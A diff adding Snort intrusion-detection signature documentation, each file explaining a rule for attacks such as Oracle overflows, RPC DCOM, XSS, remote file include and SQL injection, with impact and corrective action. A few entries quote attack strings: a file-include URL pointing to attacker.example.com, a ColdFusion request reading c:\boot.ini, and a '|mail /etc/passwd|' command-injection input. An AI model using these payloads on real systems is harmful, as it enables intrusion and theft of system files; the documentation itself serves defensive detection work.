+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2647.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2647
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_online" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck631.html
+
+--
--- /dev/null
+++ b/doc/signatures/3381.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3381
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2740.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2740
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_raw
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/691.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/212.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+212
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "rewt".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000806.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000806
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "search.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3024.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3024
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000477.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000477
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "subject.php" with SQL commands being passed as the "MainID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "MainID" parameter in the "subject.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2722.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2722
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_object_to_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3345.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3345
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2226.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2226
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP application pmachine.
+
+--
+Impact:
+Execution of arbitrary code possibly leading to a remote shell.
+
+--
+Detailed Information:
+Versions of PMachine do not properly check included files and it is 
+possible for an attacker to include a file of their choosing which may 
+lead to arbitrary code execution on the target host.
+
+--
+Affected Systems:
+	PMachine PMachine 2.2.1
+
+--
+Attack Scenarios:
+The attacker can include a file of their choosing by appending the file 
+URI to the end of a URI for the application.
+
+Proof of concept URI by FrogMan:
+
+http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/979.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+979
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross-site scripting vulnerability associated with a file having a .htw extension.
+
+--
+Impact:
+Cross-site scripting.  This attack may allow the execution of arbitrary commands on a victim host that visits a vulnerable server.
+
+--
+Detailed Information:
+The Microsoft Indexing Service is vulnerable to a cross-site scripting exploit because of a failure to properly filter user input associated with files with a .htw extension.  This vulnerability is associated with Indexing Service component (CiWebHitsFile). This may allow an attacker to execute abitrary code on the victim host that visits the vulnerable server.
+
+--
+
+Affected Systems:
+Microsoft Indexing Services for Windows NT 4.0 and Windows 2000
+
+
+--
+Attack Scenarios:
+An attacker can inject malicious code in a vulernable server.  This may allow execution of arbitrary code on the victim host that visits the vulnerable server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch discussed in the referenced Microsoft Bulletin.
+ 
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1861
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0942
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-084.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1809.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1809
+
+--
+Summary:
+This event is generated when an attempt is made to infect a web server by the "Scalper" worm.
+
+--
+Impact:
+An infected server will open ports and listen for commands as well as 
+attempt to infect more systems.
+
+--
+Detailed Information:
+This worm takes advantage of the chunked encoding vulnerability in 
+Apache to infect new systems. Once infected, the worm opens UDP port 
+2001 and will listen for additional commands. It will also begin 
+scanning for new hosts to infect.
+
+--
+Affected Systems:
+Version of Apache 1.3 up to and including 1.3.24 and versions of Apache 
+2.0 up to 2.0.36. All versions of Apache 1.2 are vulnerable. This worm 
+will only infect systems running FreeBSD.
+
+--
+Attack Scenarios:
+Typical self-replicating worm.
+
+--
+Ease of Attack:
+Simple. This is worm activity and is fully automated.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade your installation of Apache if you are running a vulnerable 
+version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Symantec
+http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/1267.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1267
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nisd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nisd is using.  Attackers can also learn what versions of the nisd protocol are accepted by nisd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nisd run.  The nisd RPC service implements Network Information Systems (NIS and NIS+).  NIS and NIS+ provide centralized management and distribution of information about resources, such as users and hosts, in a network domain.  A buffer overflow exists because of improper bounds checking, which can lead to execution of arbitrary commands on the host. 
+
+--
+Affected Systems:
+Solaris 2.3 - 2.6 hosts running NIS+.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nisd runs.  This may be a precursor to accessing nisd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nisd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nisd, not probes of the nisd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nisd service itself. An attacker may attempt to go directly to the nisd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/677
+
+CERT
+http://www.cert.org/advisories/CA-98.06.nisd.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS21
+
+
+--
--- /dev/null
+++ b/doc/signatures/3386.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3386
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1380.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1380
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/904.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+904
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. 
+
+--
+Impact:
+Serious. The vulnerability is not limited to files in the webspace, so 
+system files or additional unexecuted code files could be retrieved and 
+examined for vulnerabilities.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several 
+default Example applications installed that have vulnerabilities.  The 
+email application can be exploited to allow remote viewing of arbitrary 
+files.
+
+--
+Affected Systems:
+ColdFusion versions 4.0 thru 4.5 (4.5.1 is not vulnerable), on all 
+supported platforms
+
+--
+Attack Scenarios:
+The file at cfdocs/exampleapp/email/application.cfm includes a page,
+cfdocs/exampleapp/email/getfile.cfm, that can accept URL-mangled 
+requests like:
+
+http://www.server.com/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+
+This allows trivial remote retrieval of any file on the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant 
+vulnerabilities that are exploitable if the example code is left on a 
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References: CAN-2001-0535 
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0535
+
+--
--- /dev/null
+++ b/doc/signatures/882.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+882
+
+--
+Summary: 
+This event is generated when an attempt is made to access a web 
+application that may lead to exploitation of the application.
+
+--
+Impact: 
+Potentially harmful execution of binaries through perl open()
+
+--
+Detailed Information: 
+An open source calendar perl script by Matt Kruse, Allows commands to be executed without input verification using the perl open() function. ie /cgi-bin/calendar_admin.pl place the string "|ping 127.0.0.1|" in the configuration file field, this executes the command "ping 127.0.0.1" 
+
+--
+Affected Systems:
+Any web server running the application.
+
+--
+Attack Scenarios: 
+An unauthenticated user can execute arbitrary programs on the server by accessing calendar_admin.pl and inputting commands such as "|mail /etc/passwd|" into the configuration file field.
+
+--
+Ease of Attack: 
+Simple. No exploit software required.
+
+--
+False Positives: 
+If your webserver has pages by the name of calendar* this rule will
+fire often. Many sites now use calendar applications and this rule may 
+generate a large number of false positives, it does not distinguish 
+between perl cgi applications and php scripts. Consider tuning this rule
+for your site if it is generating a large number of false positives. If 
+you use a calendar application, consider changing the name of the script
+to something other than "calendar".
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Download a newer version of the cgi 
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Snort documentation contributed by Aaron Navratil (Initial Research)
+Snort documentation contributed by Josh Gray (Edits)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0432
+
+Bugtraq:
+http://online.securityfocus.com/bid/1215
+
+--
--- /dev/null
+++ b/doc/signatures/100000793.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000793
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "line1" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2208.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2208
+
+--
+Summary:
+This event is generated when an attempt is made to access fom.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Faq-O-Matic.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+Faq-O-Matic is a CGI-based system that automates FAQ maintenance on a web server. Versions 2.712 and lower contain a cross-site scripting vulnerability where an attacker can craft a URL with malicious code in the "cmd" argument. If a legitimate user activates the URL, malicious code may be executed on the client computer with the security context of the web server.
+
+--
+Affected Systems:
+Systems running or accessing Faq-O-Matic version 2.712 or lower.
+
+--
+Attack Scenarios:
+An attacker crafts a URL that, when activated by a legitimate user, obtains the session cookie. This can allow the attacker to pose as the user for the duration of the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses fom.cgi, this rule may generate an alert.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Faq-O-Matic version 2.713 or higher. Upgrades are available at http://faqomatic.sourceforge.net.
+
+--
